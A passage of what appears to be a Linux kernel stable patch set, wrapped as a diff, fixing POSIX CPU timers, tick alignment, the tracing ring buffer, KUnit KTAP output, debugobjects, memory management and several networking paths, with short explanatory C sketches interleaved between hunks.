+ 	p->posix_cputimers_work.scheduled = false;
+ }
+ 
+@@ -1256,6 +1301,18 @@ static inline void __run_posix_cpu_timers(struct task_struct *tsk)
+ 	lockdep_posixtimer_exit();
+ }
+ 
++static void posix_cpu_timer_wait_running(struct k_itimer *timr)
++{
++	cpu_relax();
++}
++
++static void posix_cpu_timer_wait_running_nsleep(struct k_itimer *timr)
++{
++	spin_unlock_irq(&timr->it_lock);
++	cpu_relax();
++	spin_lock_irq(&timr->it_lock);
++}
++
+ static inline bool posix_cpu_timers_work_scheduled(struct task_struct *tsk)
+ {
+ 	return false;
+@@ -1364,6 +1421,8 @@ static void handle_posix_cpu_timers(struct task_struct *tsk)
+ 		 */
+ 		if (likely(cpu_firing >= 0))
+ 			cpu_timer_fire(timer);
++		/* See posix_cpu_timer_wait_running() */
++		rcu_assign_pointer(timer->it.cpu.handling, NULL);
+ 		spin_unlock(&timer->it_lock);
+ 	}
+ }
+@@ -1498,23 +1557,16 @@ static int do_cpu_nanosleep(const clockid_t which_clock, int flags,
+ 		expires = cpu_timer_getexpires(&timer.it.cpu);
+ 		error = posix_cpu_timer_set(&timer, 0, &zero_it, &it);
+ 		if (!error) {
+-			/*
+-			 * Timer is now unarmed, deletion can not fail.
+-			 */
++			/* Timer is now unarmed, deletion can not fail. */
+ 			posix_cpu_timer_del(&timer);
++		} else {
++			while (error == TIMER_RETRY) {
++				posix_cpu_timer_wait_running_nsleep(&timer);
++				error = posix_cpu_timer_del(&timer);
++			}
+ 		}
+-		spin_unlock_irq(&timer.it_lock);
+ 
+-		while (error == TIMER_RETRY) {
+-			/*
+-			 * We need to handle case when timer was or is in the
+-			 * middle of firing. In other cases we already freed
+-			 * resources.
+-			 */
+-			spin_lock_irq(&timer.it_lock);
+-			error = posix_cpu_timer_del(&timer);
+-			spin_unlock_irq(&timer.it_lock);
+-		}
++		spin_unlock_irq(&timer.it_lock);
+ 
+ 		if ((it.it_value.tv_sec | it.it_value.tv_nsec) == 0) {
+ 			/*
+@@ -1624,6 +1676,7 @@ const struct k_clock clock_posix_cpu = {
+ 	.timer_del		= posix_cpu_timer_del,
+ 	.timer_get		= posix_cpu_timer_get,
+ 	.timer_rearm		= posix_cpu_timer_rearm,
++	.timer_wait_running	= posix_cpu_timer_wait_running,
+ };
+ 
+ const struct k_clock clock_process = {
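
The new posix_cpu_timer_wait_running() above waits out an in-flight expiry by taking and immediately releasing the mutex the task-work handler holds across handle_posix_cpu_timers(). The shape of that synchronization, sketched with POSIX threads rather than kernel mutexes (all names are illustrative):

#include <pthread.h>

struct handler_ctx {
	pthread_mutex_t expiry_mutex;	/* init with PTHREAD_MUTEX_INITIALIZER */
};

void handler_run(struct handler_ctx *ctx)
{
	pthread_mutex_lock(&ctx->expiry_mutex);
	/* ... expire timers; this is the critical section waited out ... */
	pthread_mutex_unlock(&ctx->expiry_mutex);
}

void wait_for_handler(struct handler_ctx *ctx)
{
	/* lock/unlock blocks exactly until a running handler_run() finishes */
	pthread_mutex_lock(&ctx->expiry_mutex);
	pthread_mutex_unlock(&ctx->expiry_mutex);
}
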
+diff --git a/kernel/time/posix-timers.c b/kernel/time/posix-timers.c
+index 0c8a87a11b39d..808a247205a9a 100644
+--- a/kernel/time/posix-timers.c
++++ b/kernel/time/posix-timers.c
+@@ -846,6 +846,10 @@ static struct k_itimer *timer_wait_running(struct k_itimer *timer,
+ 	rcu_read_lock();
+ 	unlock_timer(timer, *flags);
+ 
++	/*
++	 * kc->timer_wait_running() might drop RCU lock. So @timer
++	 * cannot be touched anymore after the function returns!
++	 */
+ 	if (!WARN_ON_ONCE(!kc->timer_wait_running))
+ 		kc->timer_wait_running(timer);
+ 
+diff --git a/kernel/time/tick-common.c b/kernel/time/tick-common.c
+index 46789356f856e..65b8658da829e 100644
+--- a/kernel/time/tick-common.c
++++ b/kernel/time/tick-common.c
+@@ -218,9 +218,19 @@ static void tick_setup_device(struct tick_device *td,
+ 		 * this cpu:
+ 		 */
+ 		if (tick_do_timer_cpu == TICK_DO_TIMER_BOOT) {
++			ktime_t next_p;
++			u32 rem;
++
+ 			tick_do_timer_cpu = cpu;
+ 
+-			tick_next_period = ktime_get();
++			next_p = ktime_get();
++			div_u64_rem(next_p, TICK_NSEC, &rem);
++			if (rem) {
++				next_p -= rem;
++				next_p += TICK_NSEC;
++			}
++
++			tick_next_period = next_p;
+ #ifdef CONFIG_NO_HZ_FULL
+ 			/*
+ 			 * The boot CPU may be nohz_full, in which case set
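
The tick-common change above rounds the boot CPU's first periodic tick up to the next TICK_NSEC boundary rather than starting from an arbitrary ktime_get() value. The same rounding as a standalone helper, with a plain 64-bit remainder standing in for the kernel's div_u64_rem():

#include <stdint.h>

uint64_t align_to_next_tick(uint64_t now_ns, uint64_t tick_ns)
{
	uint64_t rem = now_ns % tick_ns;

	if (rem)			/* not already on a tick boundary */
		now_ns += tick_ns - rem;
	return now_ns;
}
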
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index b0e3c9205946f..a46506f7ec6d0 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -281,6 +281,11 @@ static bool check_tick_dependency(atomic_t *dep)
+ 		return true;
+ 	}
+ 
++	if (val & TICK_DEP_MASK_RCU_EXP) {
++		trace_tick_stop(0, TICK_DEP_MASK_RCU_EXP);
++		return true;
++	}
++
+ 	return false;
+ }
+ 
+@@ -527,7 +532,7 @@ void __init tick_nohz_full_setup(cpumask_var_t cpumask)
+ 	tick_nohz_full_running = true;
+ }
+ 
+-static int tick_nohz_cpu_down(unsigned int cpu)
++bool tick_nohz_cpu_hotpluggable(unsigned int cpu)
+ {
+ 	/*
+ 	 * The tick_do_timer_cpu CPU handles housekeeping duty (unbound
+@@ -535,8 +540,13 @@ static int tick_nohz_cpu_down(unsigned int cpu)
+ 	 * CPUs. It must remain online when nohz full is enabled.
+ 	 */
+ 	if (tick_nohz_full_running && tick_do_timer_cpu == cpu)
+-		return -EBUSY;
+-	return 0;
++		return false;
++	return true;
++}
++
++static int tick_nohz_cpu_down(unsigned int cpu)
++{
++	return tick_nohz_cpu_hotpluggable(cpu) ? 0 : -EBUSY;
+ }
+ 
+ void __init tick_nohz_init(void)
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index f72b9f1de178e..221c8c404973a 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -526,7 +526,7 @@ EXPORT_SYMBOL_GPL(ktime_get_raw_fast_ns);
+  * partially updated.  Since the tk->offs_boot update is a rare event, this
+  * should be a rare occurrence which postprocessing should be able to handle.
+  *
+- * The caveats vs. timestamp ordering as documented for ktime_get_fast_ns()
++ * The caveats vs. timestamp ordering as documented for ktime_get_mono_fast_ns()
+  * apply as well.
+  */
+ u64 notrace ktime_get_boot_fast_ns(void)
+@@ -576,7 +576,7 @@ static __always_inline u64 __ktime_get_real_fast(struct tk_fast *tkf, u64 *mono)
+ /**
+  * ktime_get_real_fast_ns: - NMI safe and fast access to clock realtime.
+  *
+- * See ktime_get_fast_ns() for documentation of the time stamp ordering.
++ * See ktime_get_mono_fast_ns() for documentation of the time stamp ordering.
+  */
+ u64 ktime_get_real_fast_ns(void)
+ {
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 9d8538531a545..4acc27cb856f8 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1778,6 +1778,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 	struct list_head *head = cpu_buffer->pages;
+ 	struct buffer_page *bpage, *tmp;
+ 
++	irq_work_sync(&cpu_buffer->irq_work.work);
++
+ 	free_buffer_page(cpu_buffer->reader_page);
+ 
+ 	if (head) {
+@@ -1884,6 +1886,8 @@ ring_buffer_free(struct trace_buffer *buffer)
+ 
+ 	cpuhp_state_remove_instance(CPUHP_TRACE_RB_PREPARE, &buffer->node);
+ 
++	irq_work_sync(&buffer->irq_work.work);
++
+ 	for_each_buffer_cpu(buffer, cpu)
+ 		rb_free_cpu_buffer(buffer->buffers[cpu]);
+ 
+@@ -5333,6 +5337,9 @@ void ring_buffer_reset_cpu(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
+ 
++/* Flag to ensure proper resetting of atomic variables */
++#define RESET_BIT	(1 << 30)
++
+ /**
+  * ring_buffer_reset_online_cpus - reset a ring buffer per CPU buffer
+  * @buffer: The ring buffer to reset a per cpu buffer of
+@@ -5349,20 +5356,27 @@ void ring_buffer_reset_online_cpus(struct trace_buffer *buffer)
+ 	for_each_online_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
+-		atomic_inc(&cpu_buffer->resize_disabled);
++		atomic_add(RESET_BIT, &cpu_buffer->resize_disabled);
+ 		atomic_inc(&cpu_buffer->record_disabled);
+ 	}
+ 
+ 	/* Make sure all commits have finished */
+ 	synchronize_rcu();
+ 
+-	for_each_online_buffer_cpu(buffer, cpu) {
++	for_each_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
++		/*
++		 * If a CPU came online during the synchronize_rcu(), then
++		 * ignore it.
++		 */
++		if (!(atomic_read(&cpu_buffer->resize_disabled) & RESET_BIT))
++			continue;
++
+ 		reset_disabled_cpu_buffer(cpu_buffer);
+ 
+ 		atomic_dec(&cpu_buffer->record_disabled);
+-		atomic_dec(&cpu_buffer->resize_disabled);
++		atomic_sub(RESET_BIT, &cpu_buffer->resize_disabled);
+ 	}
+ 
+ 	mutex_unlock(&buffer->mutex);
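
RESET_BIT above packs two roles into one atomic word: the low bits keep serving as the resize-disable counter while bit 30 marks "this CPU buffer was flagged before the grace period", letting the second loop skip buffers that came online during synchronize_rcu(). A compact model of the idiom with C11 atomics in place of the kernel's atomic_t (function names are illustrative):

#include <stdatomic.h>
#include <stdbool.h>

#define RESET_BIT (1u << 30)

void mark_for_reset(atomic_uint *resize_disabled)
{
	/* adds the marker without disturbing the counter in the low bits */
	atomic_fetch_add(resize_disabled, RESET_BIT);
}

bool was_marked(atomic_uint *resize_disabled)
{
	return atomic_load(resize_disabled) & RESET_BIT;
}

void clear_mark(atomic_uint *resize_disabled)
{
	atomic_fetch_sub(resize_disabled, RESET_BIT);
}
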
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 3360d638071a1..5c1087df2f1c4 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9619,7 +9619,7 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	tr->buffer_percent = 50;
+ 
+-	trace_create_file("buffer_percent", TRACE_MODE_READ, d_tracer,
++	trace_create_file("buffer_percent", TRACE_MODE_WRITE, d_tracer,
+ 			tr, &buffer_percent_fops);
+ 
+ 	create_trace_options_dir(tr);
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 908e8a13c675b..625cab4b9d945 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1398,6 +1398,9 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 	if (unlikely(copy_from_iter(&idx, sizeof(idx), i) != sizeof(idx)))
+ 		return -EFAULT;
+ 
++	if (idx < 0)
++		return -EINVAL;
++
+ 	rcu_read_lock_sched();
+ 
+ 	refs = rcu_dereference_sched(info->refs);
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 8e21c352c1558..4dd494f786bcd 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -4850,10 +4850,16 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	struct worker *worker;
+ 	bool first = true;
+ 	unsigned long flags;
++	unsigned long hung = 0;
+ 
+ 	raw_spin_lock_irqsave(&pool->lock, flags);
+ 	if (pool->nr_workers == pool->nr_idle)
+ 		goto next_pool;
++
++	/* How long the first pending work is waiting for a worker. */
++	if (!list_empty(&pool->worklist))
++		hung = jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000;
++
+ 	/*
+ 	 * Defer printing to avoid deadlocks in console drivers that
+ 	 * queue work while holding locks also taken in their write
+@@ -4862,9 +4868,7 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	printk_deferred_enter();
+ 	pr_info("pool %d:", pool->id);
+ 	pr_cont_pool_info(pool);
+-	pr_cont(" hung=%us workers=%d",
+-		jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000,
+-		pool->nr_workers);
++	pr_cont(" hung=%lus workers=%d", hung, pool->nr_workers);
+ 	if (pool->manager)
+ 		pr_cont(" manager: %d",
+ 			task_pid_nr(pool->manager->task));
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index 6f8e5dd1dcd0c..bdfd859cccaf2 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -216,10 +216,6 @@ static struct debug_obj *__alloc_object(struct hlist_head *list)
+ 	return obj;
+ }
+ 
+-/*
+- * Allocate a new object. If the pool is empty, switch off the debugger.
+- * Must be called with interrupts disabled.
+- */
+ static struct debug_obj *
+ alloc_object(void *addr, struct debug_bucket *b, const struct debug_obj_descr *descr)
+ {
+@@ -552,36 +548,74 @@ static void debug_object_is_on_stack(void *addr, int onstack)
+ 	WARN_ON(1);
+ }
+ 
+-static void
+-__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++static struct debug_obj *lookup_object_or_alloc(void *addr, struct debug_bucket *b,
++						const struct debug_obj_descr *descr,
++						bool onstack, bool alloc_ifstatic)
+ {
+-	enum debug_obj_state state;
+-	bool check_stack = false;
+-	struct debug_bucket *db;
+-	struct debug_obj *obj;
+-	unsigned long flags;
++	struct debug_obj *obj = lookup_object(addr, b);
++	enum debug_obj_state state = ODEBUG_STATE_NONE;
++
++	if (likely(obj))
++		return obj;
++
++	/*
++	 * debug_object_init() unconditionally allocates untracked
++	 * objects. It does not matter whether it is a static object or
++	 * not.
++	 *
++	 * debug_object_assert_init() and debug_object_activate() allow
++	 * allocation only if the descriptor callback confirms that the
++	 * object is static and considered initialized. For non-static
++	 * objects the allocation needs to be done from the fixup callback.
++	 */
++	if (unlikely(alloc_ifstatic)) {
++		if (!descr->is_static_object || !descr->is_static_object(addr))
++			return ERR_PTR(-ENOENT);
++		/* Statically allocated objects are considered initialized */
++		state = ODEBUG_STATE_INIT;
++	}
++
++	obj = alloc_object(addr, b, descr);
++	if (likely(obj)) {
++		obj->state = state;
++		debug_object_is_on_stack(addr, onstack);
++		return obj;
++	}
++
++	/* Out of memory. Do the cleanup outside of the locked region */
++	debug_objects_enabled = 0;
++	return NULL;
++}
+ 
++static void debug_objects_fill_pool(void)
++{
+ 	/*
+ 	 * On RT enabled kernels the pool refill must happen in preemptible
+ 	 * context:
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_PREEMPT_RT) || preemptible())
+ 		fill_pool();
++}
++
++static void
++__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++{
++	enum debug_obj_state state;
++	struct debug_bucket *db;
++	struct debug_obj *obj;
++	unsigned long flags;
++
++	debug_objects_fill_pool();
+ 
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (!obj) {
+-		obj = alloc_object(addr, db, descr);
+-		if (!obj) {
+-			debug_objects_enabled = 0;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_objects_oom();
+-			return;
+-		}
+-		check_stack = true;
++	obj = lookup_object_or_alloc(addr, db, descr, onstack, false);
++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return;
+ 	}
+ 
+ 	switch (obj->state) {
+@@ -607,8 +641,6 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (check_stack)
+-		debug_object_is_on_stack(addr, onstack);
+ }
+ 
+ /**
+@@ -648,24 +680,24 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+  */
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 	int ret;
+-	struct debug_obj o = { .object = addr,
+-			       .state = ODEBUG_STATE_NOTAVAILABLE,
+-			       .descr = descr };
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (obj) {
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	if (likely(!IS_ERR_OR_NULL(obj))) {
+ 		bool print_object = false;
+ 
+ 		switch (obj->state) {
+@@ -698,24 +730,16 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+ 
+-	/*
+-	 * We are here when a static object is activated. We
+-	 * let the type specific code confirm whether this is
+-	 * true or not. if true, we just make sure that the
+-	 * static object is tracked in the object tracker. If
+-	 * not, this must be a bug, so we try to fix it up.
+-	 */
+-	if (descr->is_static_object && descr->is_static_object(addr)) {
+-		/* track this static object */
+-		debug_object_init(addr, descr);
+-		debug_object_activate(addr, descr);
+-	} else {
+-		debug_print_object(&o, "activate");
+-		ret = debug_object_fixup(descr->fixup_activate, addr,
+-					ODEBUG_STATE_NOTAVAILABLE);
+-		return ret ? 0 : -EINVAL;
++	/* If NULL the allocation has hit OOM */
++	if (!obj) {
++		debug_objects_oom();
++		return 0;
+ 	}
+-	return 0;
++
++	/* Object is neither static nor tracked. It's not initialized */
++	debug_print_object(&o, "activate");
++	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
++	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -869,6 +893,7 @@ EXPORT_SYMBOL_GPL(debug_object_free);
+  */
+ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+@@ -876,34 +901,25 @@ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ 	if (!debug_objects_enabled)
+ 		return;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	raw_spin_unlock_irqrestore(&db->lock, flags);
++	if (likely(!IS_ERR_OR_NULL(obj)))
++		return;
+ 
+-	obj = lookup_object(addr, db);
++	/* If NULL the allocation has hit OOM */
+ 	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		/*
+-		 * Maybe the object is static, and we let the type specific
+-		 * code confirm. Track this static object if true, else invoke
+-		 * fixup.
+-		 */
+-		if (descr->is_static_object && descr->is_static_object(addr)) {
+-			/* Track this static object */
+-			debug_object_init(addr, descr);
+-		} else {
+-			debug_print_object(&o, "assert_init");
+-			debug_object_fixup(descr->fixup_assert_init, addr,
+-					   ODEBUG_STATE_NOTAVAILABLE);
+-		}
++		debug_objects_oom();
+ 		return;
+ 	}
+ 
+-	raw_spin_unlock_irqrestore(&db->lock, flags);
++	/* Object is neither tracked nor static. It's not initialized. */
++	debug_print_object(&o, "assert_init");
++	debug_object_fixup(descr->fixup_assert_init, addr, ODEBUG_STATE_NOTAVAILABLE);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_assert_init);
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
+index 1048ef1b8d6ec..b08bb1fba106d 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -55,15 +55,25 @@ static int debugfs_print_results(struct seq_file *seq, void *v)
+ 	enum kunit_status success = kunit_suite_has_succeeded(suite);
+ 	struct kunit_case *test_case;
+ 
+-	if (!suite || !suite->log)
++	if (!suite)
+ 		return 0;
+ 
+-	seq_printf(seq, "%s", suite->log);
++	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
++	seq_puts(seq, "KTAP version 1\n");
++	seq_puts(seq, "1..1\n");
++
++	/* Print suite header because it is not stored in the test logs. */
++	seq_puts(seq, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "# Subtest: %s\n", suite->name);
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "1..%zd\n", kunit_suite_num_test_cases(suite));
+ 
+ 	kunit_suite_for_each_test_case(suite, test_case)
+ 		debugfs_print_result(seq, suite, test_case);
+ 
+-	seq_printf(seq, "%s %d - %s\n",
++	if (suite->log)
++		seq_printf(seq, "%s", suite->log);
++
++	seq_printf(seq, "%s %d %s\n",
+ 		   kunit_status_to_ok_not_ok(success), 1, suite->name);
+ 	return 0;
+ }
+diff --git a/lib/kunit/executor.c b/lib/kunit/executor.c
+index 9bbc422c284bf..74982b83707ca 100644
+--- a/lib/kunit/executor.c
++++ b/lib/kunit/executor.c
+@@ -166,7 +166,7 @@ static void kunit_exec_run_tests(struct suite_set *suite_set)
+ {
+ 	size_t num_suites = suite_set->end - suite_set->start;
+ 
+-	pr_info("TAP version 14\n");
++	pr_info("KTAP version 1\n");
+ 	pr_info("1..%zu\n", num_suites);
+ 
+ 	__kunit_test_suites_init(suite_set->start, num_suites);
+@@ -177,8 +177,8 @@ static void kunit_exec_list_tests(struct suite_set *suite_set)
+ 	struct kunit_suite * const *suites;
+ 	struct kunit_case *test_case;
+ 
+-	/* Hack: print a tap header so kunit.py can find the start of KUnit output. */
+-	pr_info("TAP version 14\n");
++	/* Hack: print a ktap header so kunit.py can find the start of KUnit output. */
++	pr_info("KTAP version 1\n");
+ 
+ 	for (suites = suite_set->start; suites < suite_set->end; suites++)
+ 		kunit_suite_for_each_test_case((*suites), test_case) {
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 2a6992fe7c3e4..184df6f701b48 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -149,9 +149,18 @@ EXPORT_SYMBOL_GPL(kunit_suite_num_test_cases);
+ 
+ static void kunit_print_suite_start(struct kunit_suite *suite)
+ {
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "# Subtest: %s",
++	/*
++	 * We do not log the test suite header as doing so would
++	 * mean debugfs display would consist of the test suite
++	 * header prior to individual test results.
++	 * Hence directly printk the suite status, and we will
++	 * separately seq_printf() the suite header for the debugfs
++	 * representation.
++	 */
++	pr_info(KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	pr_info(KUNIT_SUBTEST_INDENT "# Subtest: %s\n",
+ 		  suite->name);
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "1..%zd",
++	pr_info(KUNIT_SUBTEST_INDENT "1..%zd\n",
+ 		  kunit_suite_num_test_cases(suite));
+ }
+ 
+@@ -168,20 +177,19 @@ static void kunit_print_ok_not_ok(void *test_or_suite,
+ 
+ 	/*
+ 	 * We do not log the test suite results as doing so would
+-	 * mean debugfs display would consist of the test suite
+-	 * description and status prior to individual test results.
+-	 * Hence directly printk the suite status, and we will
+-	 * separately seq_printf() the suite status for the debugfs
++	 * mean debugfs display would consist of an incorrect test
++	 * number. Hence directly printk the suite result, and we will
++	 * separately seq_printf() the suite results for the debugfs
+ 	 * representation.
+ 	 */
+ 	if (suite)
+-		pr_info("%s %zd - %s%s%s\n",
++		pr_info("%s %zd %s%s%s\n",
+ 			kunit_status_to_ok_not_ok(status),
+ 			test_number, description, directive_header,
+ 			(status == KUNIT_SKIPPED) ? directive : "");
+ 	else
+ 		kunit_log(KERN_INFO, test,
+-			  KUNIT_SUBTEST_INDENT "%s %zd - %s%s%s",
++			  KUNIT_SUBTEST_INDENT "%s %zd %s%s%s",
+ 			  kunit_status_to_ok_not_ok(status),
+ 			  test_number, description, directive_header,
+ 			  (status == KUNIT_SKIPPED) ? directive : "");
+@@ -542,6 +550,8 @@ int kunit_run_tests(struct kunit_suite *suite)
+ 			/* Get initial param. */
+ 			param_desc[0] = '\0';
+ 			test.param_value = test_case->generate_params(NULL, param_desc);
++			kunit_log(KERN_INFO, &test, KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
++				  "KTAP version 1\n");
+ 			kunit_log(KERN_INFO, &test, KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
+ 				  "# Subtest: %s", test_case->name);
+ 
+@@ -555,7 +565,7 @@ int kunit_run_tests(struct kunit_suite *suite)
+ 
+ 				kunit_log(KERN_INFO, &test,
+ 					  KUNIT_SUBTEST_INDENT KUNIT_SUBTEST_INDENT
+-					  "%s %d - %s",
++					  "%s %d %s",
+ 					  kunit_status_to_ok_not_ok(test.status),
+ 					  test.param_index + 1, param_desc);
+ 
+diff --git a/mm/kasan/hw_tags.c b/mm/kasan/hw_tags.c
+index b22c4f461cb0b..cc9bc99e47cd1 100644
+--- a/mm/kasan/hw_tags.c
++++ b/mm/kasan/hw_tags.c
+@@ -225,7 +225,7 @@ static void init_vmalloc_pages(const void *start, unsigned long size)
+ 	const void *addr;
+ 
+ 	for (addr = start; addr < start + size; addr += PAGE_SIZE) {
+-		struct page *page = virt_to_page(addr);
++		struct page *page = vmalloc_to_page(addr);
+ 
+ 		clear_highpage_kasan_tagged(page);
+ 	}
+@@ -237,7 +237,7 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	u8 tag;
+ 	unsigned long redzone_start, redzone_size;
+ 
+-	if (!kasan_vmalloc_enabled() || !is_vmalloc_or_module_addr(start)) {
++	if (!kasan_vmalloc_enabled()) {
+ 		if (flags & KASAN_VMALLOC_INIT)
+ 			init_vmalloc_pages(start, size);
+ 		return (void *)start;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index e132f70a059e8..7d36dd95d1fff 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -802,8 +802,10 @@ static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
+ 		vmstart = vma->vm_start;
+ 	}
+ 
+-	if (mpol_equal(vma_policy(vma), new_pol))
++	if (mpol_equal(vma_policy(vma), new_pol)) {
++		*prev = vma;
+ 		return 0;
++	}
+ 
+ 	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
+ 	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index dc66f6715bfc4..d18296109aa7e 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1887,6 +1887,16 @@ retry:
+ 			}
+ 		}
+ 
++		/*
++		 * Folio is unmapped now so it cannot be newly pinned anymore.
++		 * No point in trying to reclaim folio if it is pinned.
++		 * Furthermore we don't want to reclaim underlying fs metadata
++		 * if the folio is pinned and thus potentially modified by the
++		 * pinning process as that may upset the filesystem.
++		 */
++		if (folio_maybe_dma_pinned(folio))
++			goto activate_locked;
++
+ 		mapping = folio_mapping(folio);
+ 		if (folio_test_dirty(folio)) {
+ 			/*
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index e1bb41a443c43..07e86d03d4bae 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -365,7 +365,7 @@ static int vlan_dev_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ 	switch (cmd) {
+ 	case SIOCSHWTSTAMP:
+-		if (!net_eq(dev_net(dev), &init_net))
++		if (!net_eq(dev_net(dev), dev_net(real_dev)))
+ 			break;
+ 		fallthrough;
+ 	case SIOCGMIIPHY:
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index cd4b3a610961f..597c1f17d3889 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4972,6 +4972,9 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 			skb = alloc_skb(0, GFP_ATOMIC);
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
++
++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
++			return;
+ 	}
+ 	if (!skb)
+ 		return;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b9d7c3dd1cb39..c0fd8f5f3b94e 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -783,6 +783,7 @@ lookup:
+ 
+ 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
+ 		goto discard_and_relse;
++	nf_reset_ct(skb);
+ 
+ 	return __sk_receive_skb(sk, skb, 1, dh->dccph_doff * 4,
+ 				refcounted) ? -1 : 0;
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 922c87ef1ab58..2a07588265c70 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1570,9 +1570,19 @@ struct sk_buff *__ip_make_skb(struct sock *sk,
